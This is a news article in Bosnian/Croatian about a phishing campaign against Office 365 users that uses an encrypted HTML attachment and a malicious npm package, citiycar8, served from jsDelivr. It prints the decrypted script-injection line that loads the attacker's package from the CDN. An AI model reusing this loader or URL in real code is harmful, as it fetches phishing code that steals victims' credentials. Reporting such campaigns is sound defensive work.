Pojavila se sofisticirana phishing kampanja usmjerena na korisnike Microsoft Office 365 paketa, koja kombinira nekoliko naprednih tehnika za izbjegavanje otkrivanja i prikupljanje podataka o identitetu.
Napad, identifikovan početkom aprila 2025. godine, koristi šifrovane HTML datoteke, mreže za isporuku sadržaja (CDN) i zlonamjerne npm pakete u višestepenom pristupu koji stručnjaci za sajber sigurnost opisuju kao neuobičajeno složen za tipične phishing operacije.
Napad počinje bezazleno e-poštom koja navodno sadrži finansijske informacije, tačnije datoteku “EFT-PMT.htm” prikrivenu kao dokumentacija o plaćanju.
Za razliku od konvencionalnih pokušaja phishinga koji se oslanjaju na očigledna preusmjeravanja ili sumnjive priloge, ova kampanja koristi enkripciju naprednog standarda šifriranja (AES) kako bi prikrila svoj maliciozni sadržaj, što predstavlja značajnu evoluciju u metodologijama prijetnji.
Istraživači kompanije Fortra identifikovali su napad putem svog tima za analizu sumnjivih e-poruka (SEA), napominjući da, iako je svaka pojedinačna tehnika već uočena ranije, ovo označava prvi dokumentovani slučaj u kojem su ove posebne metode kombinovane kako bi se izvršio phishing napad na Microsoft O365.
Istraživači su naglasili da napad pokazuje kako hakeri sve više zloupotrebljavaju repozitorije otvorenog koda za provođenje sofisticiranih kampanja.
Nakon otvaranja naizgled bezopasnog HTML priloga, žrtve nesvjesno aktiviraju skriveni skript koji se povezuje s npm paketom hostovanim na legitimnoj CDN mreži (jsDelivr), dodatno maskirajući malicioznu aktivnost iza pouzdane infrastrukture.
Tehnička složenost napada i korištenje alata za razvojne programere predstavljaju zabrinjavajući trend u taktikama krađe identiteta (phishing) usmjerenim i na tehničke i na netehničke korisnike.
Analiza mehanizma infekcije
Suština sofisticiranosti ovog napada leži u njegovom višeslojnom mehanizmu infekcije. Kada žrtva otvori HTML prilog, aktivira kod koji sadrži šifrovani niz pohranjen u varijabli pod nazivom „encryptedAthens“.
Ova metoda šifrovanja je posebno značajna jer se AES rijetko koristi u tipičnim phishing kampanjama, koje se obično oslanjaju na jednostavnije tehnike obfuskacije.
Kada se dešifrira, skriveni kod otkriva naredbu za umetanje skripte: let geog = document.createElement('script');geog.type = 'text/javascript';geog.src = 'https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS"; document.head.appendChild(geog);.
Ovaj skript učitava maliciozni npm paket “citiycar8” (verzija 2.1.9) iz jsDelivr-a, popularne i legitimne CDN usluge koju koriste programeri širom svijeta.
Npm paket sadrži JavaScript datoteku pod nazivom „NOW.API.JS“ koja služi kao druga faza napada.
Ova datoteka bilježi email adresu žrtve i pohranjuje je u varijablu pod nazivom „adidas“, što napadačima omogućava personalizaciju naknadnih phishing URL-ova.
Ono što ovaj napad čini posebno podmuklim jeste način na koji iskorištava legitimnu razvojnu infrastrukturu, pri čemu je maliciozni kod sakriven direktno unutar paketa, a ne u opisnim datotekama poput README dokumenata.
Kako napad napreduje, skripta preusmjerava žrtve kroz više URL-ova prije nego što stigne do konačne phishing stranice – uvjerljive replike ekrana za prijavu na Microsoft Office 365.
Akteri prijetnji su čak implementirali mjere za nepredviđene situacije, a verzija 2.1.10 paketa sadrži ažurirane URL-ove koji se aktiviraju kada se prethodna infrastruktura isključi iz mreže.
Ova phishing kampanja pokazuje kako sajber kriminalci nastavljaju usavršavati svoje tehnike, kombinujući enkripciju, legitimne alate za razvoj i višefazne napade kako bi zaobišli sigurnosne kontrole i prikupili vrijedne podatke od ništa ne slutećih žrtava.
Organizacije bi trebale ostati oprezne u vezi s neobičnim vezama, čak i kada na prvi pogled izgledaju bezopasno.
Izvor: CyberSecurityNews